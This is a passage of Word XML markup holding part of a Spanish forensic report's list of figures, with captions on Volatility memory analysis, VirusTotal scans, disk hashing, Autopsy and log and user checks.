        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Comando linux_dmesg.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782596 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>35</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3370EA4F" w14:textId="3B25BA9B"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49" w:anchor="_Toc155782597" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Extracto comando linux_bash.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782597 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>37</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0DD9B384" w14:textId="64CE9DB0"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50" w:anchor="_Toc155782598" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Extracto de comando linux_pslist.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782598 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>41</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="73C8881F" w14:textId="2130195E"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51" w:anchor="_Toc155782599" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Extracto de comando linux_pstree.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782599 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>41</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F1AFDCD" w14:textId="294FAADF"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52" w:anchor="_Toc155782600" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Buscando UserID 33 en VM volatility.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782600 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>42</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79879B14" w14:textId="6D25E1C1"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53" w:anchor="_Toc155782601" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Volcado de datos y cantidad de archivos recuperados.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782601 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>42</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="625546F9" w14:textId="3B3C19EA"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54" w:anchor="_Toc155782602" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Archivo /etc/passwd y comprimiendo volcado.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782602 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>43</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C90B045" w14:textId="1FB3DC7B"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55" w:anchor="_Toc155782603" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hash de volcado de datos.zip y análisis en VirusTotal.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782603 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>43</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55C743E5" w14:textId="68B58E2C"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56" w:anchor="_Toc155782604" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Análisis de /var y /var/lib en VirusTotal.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782604 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="588499B5" w14:textId="0AAC2A0E"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57" w:anchor="_Toc155782605" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Análisis de /var/www y /var/lib/snapd en VirusTotal.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782605 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="720995B5" w14:textId="745297F9"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58" w:anchor="_Toc155782606" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Análisis de /var/lib/snapd/snaps y /var/www/html/.htcaccess en VirusTotal.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782606 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="74C1429A" w14:textId="69A9BAB2"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59" w:anchor="_Toc155782607" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Detalles de /var/www/html/.htcaccess.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782607 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>45</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="352505E8" w14:textId="657B4A6A"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60" w:anchor="_Toc155782608" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Comando linux_arp.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782608 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>45</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="686067C6" w14:textId="25E3BFD6"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61" w:anchor="_Toc155782609" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Comando linux_ifconfig.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782609 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>46</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="557A169B" w14:textId="0816B3BB"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62" w:anchor="_Toc155782610" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Extracto de comando linux_netstat.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782610 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>46</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="47C225EE" w14:textId="2C8B3700"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63" w:anchor="_Toc155782611" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hash del Disco Duro.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782611 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>48</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E35EB55" w14:textId="1EC0C742"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64" w:anchor="_Toc155782612" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Calculo de Hash con PowerShell.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782612 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>48</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="75920DD8" w14:textId="3EE483BA"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65" w:anchor="_Toc155782613" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Carga de nuevo caso en Autopsy y datos de fuente añadidos correctamente.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782613 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>49</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F29FBF2" w14:textId="5540B7AE"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66" w:anchor="_Toc155782614" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Comprobación del archivo Bash history del recover filesystem y de la captura del disco duro.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782614 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>49</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="08B36316" w14:textId="02032D1A"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67" w:anchor="_Toc155782615" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Descripción del sistema operativo.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782615 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>49</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64ECF352" w14:textId="66733CED"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68" w:anchor="_Toc155782616" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Comprobación usuarios del sistema.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782616 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>50</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="713F70B2" w14:textId="71708CB1"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69" w:anchor="_Toc155782617" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Comando grep “user” auth.log y prueba de instalación del Sistema Operativo.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782617 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
